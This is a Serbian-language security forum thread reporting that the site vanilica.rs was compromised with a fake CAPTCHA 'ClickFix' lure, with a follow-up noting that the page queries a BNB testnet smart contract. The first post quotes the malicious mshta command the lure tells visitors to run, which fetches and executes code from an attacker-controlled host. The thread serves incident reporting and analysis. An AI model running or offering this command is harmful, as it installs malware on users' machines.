vanilica.rs - Fake Captcha - ClickFix
#1

Zdravo,
od danas je poznato da je kompromitovan sajt vanilica[.]rs i postavljen je na home-page fake captcha - takoje identifikovan kao clickfix napad koji za human verifikaciju trazi da se unese i izvrsi malicionza powershell komanda:
"mshta https://d.pisora.ru/u8.google?t=t2728jot"

U vreme detekcije fakecapthcha se ne vidi na:
https://urlscan.io/result/0199b8d5-1ae4-...d85f8d412/
Ali je identifikovana na sandboxu Browserling: https://www.browserling.com/

Pozdrav.


Attached Files Image(s)
       
Reply
#2

zanimljivo, sigurno zahteva neke posebne uslove ili referal da bi otvorio, možda neće sa RS IP adresa? Običnim otvaranjem sajta ne uspevam da ga trigerujem. Ali preko browserlinga hoće :

   

   

   


Zanimljivo je i da poziva BNB Test Chain konkretno šalje podatke na konkretnu adresu i dobija odgovor

https://testnet.bscscan.com/address/0xA1...0baf727d2e

Contract creator je https://testnet.bscscan.com/address/0xd7...8b4c2d5290

Code:
{"method":"eth_call","params":[{"to":"0xA1decFB75C8C0CA28C10517ce56B710baf727d2e","data":"0x6d4ce63c"},"latest"],"id":97,"jsonrpc":"2.0"}


i dobije odgovor: 

Code:
{     "jsonrpc": "2.0",     "id": 97,     "result": "0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000026e6f000000000000000000000000000000000000000000000000000000000000" }

kopaću još kad stignem
Reply


Forum Jump:


Users browsing this thread: